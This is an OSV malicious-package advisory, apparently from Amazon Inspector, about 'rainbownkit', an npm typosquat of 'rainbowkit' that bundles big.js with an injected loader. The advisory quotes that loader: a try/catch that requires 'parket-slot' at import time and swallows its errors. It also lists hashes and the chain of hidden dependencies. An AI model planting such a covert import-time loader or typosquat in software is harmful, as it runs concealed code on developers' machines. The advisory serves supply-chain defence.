{"id":"MAL-2026-6340","summary":"Malicious code in rainbownkit (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (970be1fb6306ff1e8dc6119d96404f600a1eb44a47124e2910bb9237bb80fe9a)\nPackage 'rainbownkit' is a single-character typosquat of the popular Web3 library 'rainbowkit'. The shipped source, README, repository URL, and author metadata are copied verbatim from the unrelated 'big.js' arbitrary-precision math library — a developer installing this expecting RainbowKit instead receives big.js with an injected covert loader. The package's main entry (big.js and big.mjs, both referenced via `main` and `exports`) contains an injected try/catch around line 606 that runs at require/import time: `const doc = require(\"parket-slot\"); doc.from_str().then(e =\u003e {}).catch(e =\u003e {})`. The 'parket-slot' module is not declared in package.json and would be pulled in transitively via the package's only declared runtime dependency 'log-taker' (`^0.0.9`), an undocumented niche package with no relation to the package's claimed purpose. All errors are silently swallowed, making the hidden execution invisible to the consumer. Anyone who runs `require('rainbownkit')` (or any code that imports it) executes whatever code the 'parket-slot' / 'log-taker' chain delivers at that moment — a classic two-hop dependency-confusion supply-chain payload combined with name impersonation of a high-traffic Web3 package.\n","modified":"2026-06-23T21:01:21.428559488Z","published":"2026-06-23T20:01:24Z","database_specific":{"malicious-packages-origins":[{"sha256":"970be1fb6306ff1e8dc6119d96404f600a1eb44a47124e2910bb9237bb80fe9a","modified_time":"2026-06-23T20:01:24Z","import_time":"2026-06-23T20:48:30.53507161Z","id":"IN-MAL-2026-007354","source":"amazon-inspector","versions":["0.0.8"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/rainbownkit/v/0.0.8"}],"affected":[{"package":{"name":"rainbownkit","ecosystem":"npm","purl":"pkg:npm/rainbownkit"},"versions":["0.0.8"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rainbownkit/MAL-2026-6340.json","indicators":{"package_integrity":[{"filename":"rainbownkit-0.0.8.tgz","hashes":{"sha512_sri":"sha512-Ru8xsXyJdZ+j5/0+qDdowD9yV3derEcpLi9ozzAiRBgH96SM2klwlc0NQcBsSlz4wwAdPQsvFSpLCfg25BCiLg==","sha1":"06fc33f46ad8a5d4a6bf1d95eea59c386e3ad0e0"}}],"evidence_files":[{"sha256":"8ee421f3aa743362a6d8f3fbdb0192c1bba7411414379eee44c7072d69a2ae3f","path":"package.json","tlsh":"65210477c9a59da70af85ba47c6c03aaf1151b1f00a04c57b0bb130c4f3355b2095bbd"},{"sha256":"5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace","tlsh":"24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc","path":"big.js"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}